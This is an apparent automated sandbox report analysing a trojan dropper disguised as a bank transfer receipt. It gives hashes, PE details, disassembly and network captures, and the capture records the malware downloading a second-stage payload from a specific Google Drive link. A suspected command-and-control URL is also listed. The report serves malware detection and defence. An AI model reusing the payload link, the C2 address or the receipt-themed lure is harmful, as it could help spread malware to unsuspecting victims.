Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.nongrav.exe.560000.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
22.2.svchost.exe.3f3796c.4.unpack	100%	Avira	TR/Dropper.Gen	Download File
22.2.svchost.exe.3214020.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
15.1.nongrav.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.nongrav.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
www.thesocialmediacreator.com/i638/	5%	Virustotal		Browse
www.thesocialmediacreator.com/i638/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	172.217.168.46	true	false	high
googlehosted.l.googleusercontent.com	172.217.168.1	true	false	high
doc-0c-ao-docs.googleusercontent.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-0c-ao-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3t0pvfkcl5sqbkpotb7a08dnj393g/1639574025000/11789396277519397655/*/1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ?e=download	false		high
www.thesocialmediacreator.com/i638/	true	5%, Virustotal, Browse Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.217.168.46	drive.google.com	United States		15169	GOOGLEUS	false
172.217.168.1	googlehosted.l.googleusercontent.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	540355
Start date:	15.12.2021
Start time:	14:09:29
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 24s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/1@2/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 42.9% (good quality ratio 37.4%) Quality average: 68.4% Quality standard deviation: 34%
HCA Information:	Successful, ratio: 69% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 2.20.205.141 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Download File
Process:	C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	102400
Entropy (8bit):	6.642357579130979
Encrypted:	false
SSDEEP:	1536:hs45GgwFzTYSKUc//9qrMyk3+lGsc5iTq0wHmYt:hN+zTYS5acZk3+lGuqzH7t
MD5:	BEB33BD2BF3282F8C86081144236545D
SHA1:	03114FA621E4944693F897C6A015776F4B81BE2B
SHA-256:	F27110BABA677C03A4A1B87E19D5FB34C96A7E5F5A3D810E132442A240B97827
SHA-512:	DEAC0697F44163BE7AA6FCFAD1A0F7DD7B5BCB9CD9DA36B1DEC47368E14C336B97CE801D7AE938CDF605CCA92618777D062C93D091B3B5D1ECC40F2205E7984D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L...9.]H.................`...0...............p....@.................................;........................................d..(...........................................................................8... ....................................text...HZ.......`.................. ..`.data........p.......p..............@....rsrc...............................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.351689762780545
TrID:	Win32 Executable (generic) a (10002005/4) 97.02% Win32 MS Cabinet Self-Extractor (WExtract stub) (303627/2) 2.95% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
File size:	209920
MD5:	72a345c95142aee60e7df54b570c2c6b
SHA1:	aa479735d39ced67594ff0b0d5f91679e506ac38
SHA256:	a7a0ada5969b3b343a5c2d17e1fe57f542a0f9cb94b98daf7a4922d8cdcd5e8d
SHA512:	597d7673d2d69598d31a2edc71651c285d3253af53c06653a4d1504db9c71575141ace6fbc2371acd0517d43ac0b135c0b213979b657a035cbb1744504d437c7
SSDEEP:	6144:DK6g8ITQp0yN90QEN3Gm7CTon9jiNLk/ybI:DKRy90v30O9TeI
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*...n.k.n.k.n.k..^..i.k..^..`.k..^..(.k..^....k.n.j...k..^..g.k.Ig..o.k..^..o.k..^..o.k.Richn.k.................PE..L.....ST...

File Icon


Icon Hash:	f8e0e4e8ecccc870

Static PE Info

General
Entrypoint:	0x4069d0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x545301EF [Fri Oct 31 03:28:47 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	3
File Version Major:	6
File Version Minor:	3
Subsystem Version Major:	6
Subsystem Version Minor:	3
Import Hash:	bc70c4fa605f17c85050b7c7b6d42e44

Entrypoint Preview

Instruction
call 00007FCD80BC1808h
jmp 00007FCD80BC0C3Ah
int3
int3
int3
int3
int3
push 0000005Ch
push 00407900h
call 00007FCD80BC18BEh
and dword ptr [ebp-24h], 00000000h
and dword ptr [ebp-04h], 00000000h
lea eax, dword ptr [ebp-6Ch]
push eax
call dword ptr [0040A170h]
mov dword ptr [ebp-04h], FFFFFFFEh
xor ebx, ebx
inc ebx
mov dword ptr [ebp-04h], ebx
mov eax, dword ptr fs:[00000018h]
mov edi, dword ptr [eax+04h]
xor esi, esi
mov edx, 004088ECh
mov ecx, edi
xor eax, eax
lock cmpxchg dword ptr [edx], ecx
test eax, eax
je 00007FCD80BC0C38h
cmp eax, edi
jne 00007FCD80BC0C46h
mov esi, ebx
cmp dword ptr [004088F0h], ebx
jne 00007FCD80BC0C49h
push 0000001Fh
call 00007FCD80BC1624h
pop ecx
jmp 00007FCD80BC0C6Eh
push 000003E8h
call dword ptr [0040A16Ch]
jmp 00007FCD80BC0BFCh
cmp dword ptr [004088F0h], 00000000h
jne 00007FCD80BC0C52h
mov dword ptr [004088F0h], ebx
push 00401018h
push 0040100Ch
call 00007FCD80BC0D96h
pop ecx
pop ecx
test eax, eax
je 00007FCD80BC0C3Dh
jmp 00007FCD80BC0D74h
mov dword ptr [00408224h], ebx
cmp dword ptr [004088F0h], ebx
jne 00007FCD80BC0C4Dh
push 00401008h
push 00401000h
call 00007FCD80BC180Ch
pop ecx
pop ecx
mov dword ptr [004088F0h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa294	0xb4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x2a408	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x37000	0x8c0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x10a0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x13d8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x290	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6964	0x6a00	False	0.572044516509	data	6.35037999484	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x8000	0x1a8c	0x400	False	0.3232421875	data	3.17592784688	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0xa000	0x107c	0x1200	False	0.418402777778	data	5.04714087963	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x2b000	0x2a600	False	0.8237117441	data	7.44533811021	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x37000	0x8c0	0xa00	False	0.771875	data	6.37328857441	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AVI	0xc9f8	0x2e1a	RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp	English	United States
RT_ICON	0xf814	0x668	data	English	United States
RT_ICON	0xfe7c	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2291109880, next used block 28872	English	United States
RT_ICON	0x10164	0x1e8	data	English	United States
RT_ICON	0x1034c	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x10474	0xea8	data	English	United States
RT_ICON	0x1131c	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 15066613, next used block 15000828	English	United States
RT_ICON	0x11bc4	0x6c8	data	English	United States
RT_ICON	0x1228c	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x127f4	0xd9d2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x201c8	0x25a8	data	English	United States
RT_ICON	0x22770	0x10a8	data	English	United States
RT_ICON	0x23818	0x988	data	English	United States
RT_ICON	0x241a0	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x24608	0x2f2	data	English	United States
RT_DIALOG	0x248fc	0x1b0	data	English	United States
RT_DIALOG	0x24aac	0x166	data	English	United States
RT_DIALOG	0x24c14	0x1c0	data	English	United States
RT_DIALOG	0x24dd4	0x130	data	English	United States
RT_DIALOG	0x24f04	0x120	data	English	United States
RT_STRING	0x25024	0x8c	data	English	United States
RT_STRING	0x250b0	0x520	data	English	United States
RT_STRING	0x255d0	0x5cc	data	English	United States
RT_STRING	0x25b9c	0x4b0	data	English	United States
RT_STRING	0x2604c	0x44a	data	English	United States
RT_STRING	0x26498	0x3ce	data	English	United States
RT_RCDATA	0x26868	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x26870	0xf062	Microsoft Cabinet archive data, 61538 bytes, 1 file	English	United States
RT_RCDATA	0x358d4	0x4	data	English	United States
RT_RCDATA	0x358d8	0x24	data	English	United States
RT_RCDATA	0x358fc	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x35904	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x3590c	0x4	data	English	United States
RT_RCDATA	0x35910	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x35918	0x4	data	English	United States
RT_RCDATA	0x3591c	0xc	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x35928	0x4	data	English	United States
RT_RCDATA	0x3592c	0x9	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x35938	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x35940	0x7	ASCII text, with no line terminators	English	United States
RT_GROUP_ICON	0x35948	0xbc	data	English	United States
RT_VERSION	0x35a04	0x41c	data	English	United States
RT_MANIFEST	0x35e20	0x5e7	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, RegSetValueExA, EqualSid, RegQueryValueExA, LookupPrivilegeValueA, RegCreateKeyExA, RegOpenKeyExA, RegQueryInfoKeyA, RegDeleteValueA, AllocateAndInitializeSid, FreeSid, AdjustTokenPrivileges, RegCloseKey
KERNEL32.dll	GetPrivateProfileIntA, GetFileAttributesA, IsDBCSLeadByte, GetSystemDirectoryA, GlobalUnlock, GetShortPathNameA, CreateDirectoryA, FindFirstFileA, GetLastError, GetProcAddress, RemoveDirectoryA, SetFileAttributesA, GlobalFree, FindClose, GetPrivateProfileStringA, LoadLibraryA, LocalAlloc, WritePrivateProfileStringA, GetModuleFileNameA, FindNextFileA, CompareStringA, _lopen, CloseHandle, LocalFree, DeleteFileA, ExitProcess, DosDateTimeToFileTime, CreateFileA, FindResourceA, GlobalAlloc, ExpandEnvironmentStringsA, LoadResource, WaitForSingleObject, SetEvent, GetModuleHandleW, FormatMessageA, SetFileTime, WriteFile, GetDriveTypeA, GetVolumeInformationA, TerminateThread, SizeofResource, CreateEventA, GetExitCodeProcess, CreateProcessA, _llseek, SetCurrentDirectoryA, GetTempFileNameA, ResetEvent, LockResource, GetSystemInfo, LoadLibraryExA, CreateMutexA, GetCurrentDirectoryA, GetVersionExA, GetVersion, GetTempPathA, CreateThread, LocalFileTimeToFileTime, SetFilePointer, GetWindowsDirectoryA, lstrcmpA, _lclose, GlobalLock, GetCurrentProcess, FreeResource, FreeLibrary, Sleep, GetStartupInfoA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, OutputDebugStringA, RtlUnwind, GetModuleHandleA, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, MulDiv, GetDiskFreeSpaceA, ReadFile
GDI32.dll	GetDeviceCaps
USER32.dll	GetDC, SendMessageA, SetForegroundWindow, MsgWaitForMultipleObjects, SendDlgItemMessageA, GetWindowRect, MessageBoxA, GetWindowLongA, PeekMessageA, ReleaseDC, GetDlgItem, SetWindowPos, ShowWindow, DispatchMessageA, SetWindowTextA, EnableWindow, CallWindowProcA, DialogBoxIndirectParamA, GetDlgItemTextA, LoadStringA, MessageBeep, CharUpperA, CharNextA, ExitWindowsEx, CharPrevA, EndDialog, GetDesktopWindow, SetDlgItemTextA, SetWindowLongA, GetSystemMetrics
msvcrt.dll	memset, ?terminate@@YAXXZ, _controlfp, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _acmdln, _initterm, _amsg_exit, __p__commode, _XcptFilter, _errno, _vsnprintf, __setusermatherr
COMCTL32.dll
Cabinet.dll
VERSION.dll	GetFileVersionInfoA, GetFileVersionInfoSizeA, VerQueryValueA

Version Infos

Description	Data
LegalCopyright	Microsoft Corporation. All rights reserved.
InternalName	Wextract
FileVersion	11.00.9600.16384 (winblue_rtm.130821-1623)
CompanyName	Microsoft Corporation
ProductName	Internet Explorer
ProductVersion	11.00.9600.16384
FileDescription	Win32 Cabinet Self-Extractor
OriginalFilename	WEXTRACT.EXE .MUI
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 15, 2021 14:13:47.579505920 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:47.579541922 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:47.579667091 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:47.609344959 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:47.609366894 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:47.663666010 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:47.663839102 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:47.664535046 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:47.664617062 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:48.022409916 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:48.022435904 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:48.022910118 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:48.023005962 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:48.026207924 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:48.068883896 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:48.488166094 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:48.488328934 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:48.488409042 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:48.490288019 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:48.568181038 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:48.568227053 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:48.635415077 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.635452986 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.635621071 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.636941910 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.636953115 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.694639921 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.694947958 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.695548058 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.695683956 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.708836079 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.708862066 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.709161997 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.709225893 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.710095882 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.752865076 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.954212904 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.954411030 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.955681086 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.955866098 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.957496881 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.957570076 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.958610058 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.958703041 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.959789038 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.959846973 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.959887981 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.959953070 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.960983038 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.961049080 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.971039057 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.971107960 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.971148968 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.971215963 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.971458912 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.971518993 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.971559048 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.971627951 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.972702026 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.972768068 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.972800016 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.972886086 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.973855019 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.973922014 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.973949909 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.974050045 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.975066900 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.975158930 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.975176096 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.975235939 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.976248026 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.976414919 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.976438046 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.976524115 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.977534056 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.977631092 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.977646112 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.977730989 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.978679895 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.978780031 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.978794098 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.978844881 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.979779959 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.979943991 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.979959011 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.980016947 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.980901003 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.980973959 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.981381893 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.981451988 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.981462955 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.981517076 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.982481003 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.982536077 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.982557058 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.982567072 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.982599020 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.982630968 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.983546019 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.983623028 CET	49838	443	192.168.2.3	172.217.168.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 15, 2021 14:13:47.532352924 CET	58540	53	192.168.2.3	8.8.8.8
Dec 15, 2021 14:13:47.557713032 CET	53	58540	8.8.8.8	192.168.2.3
Dec 15, 2021 14:13:48.603138924 CET	55108	53	192.168.2.3	8.8.8.8
Dec 15, 2021 14:13:48.630215883 CET	53	55108	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 15, 2021 14:13:47.532352924 CET	192.168.2.3	8.8.8.8	0x4b1d	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)
Dec 15, 2021 14:13:48.603138924 CET	192.168.2.3	8.8.8.8	0x5477	Standard query (0)	doc-0c-ao-docs.googleusercontent.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 15, 2021 14:13:47.557713032 CET	8.8.8.8	192.168.2.3	0x4b1d	No error (0)	drive.google.com		172.217.168.46	A (IP address)	IN (0x0001)
Dec 15, 2021 14:13:48.630215883 CET	8.8.8.8	192.168.2.3	0x5477	No error (0)	doc-0c-ao-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Dec 15, 2021 14:13:48.630215883 CET	8.8.8.8	192.168.2.3	0x5477	No error (0)	googlehosted.l.googleusercontent.com		172.217.168.1	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

doc-0c-ao-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49837	172.217.168.46	443	C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-15 13:13:48 UTC	0	OUT	GET /uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2021-12-15 13:13:48 UTC	0	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 15 Dec 2021 13:13:48 GMT Location: https://doc-0c-ao-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3t0pvfkcl5sqbkpotb7a08dnj393g/1639574025000/11789396277519397655/*/1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ?e=download P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'nonce-EMXjOSw4Y96UYi94oVhyrg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq" Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]} X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: 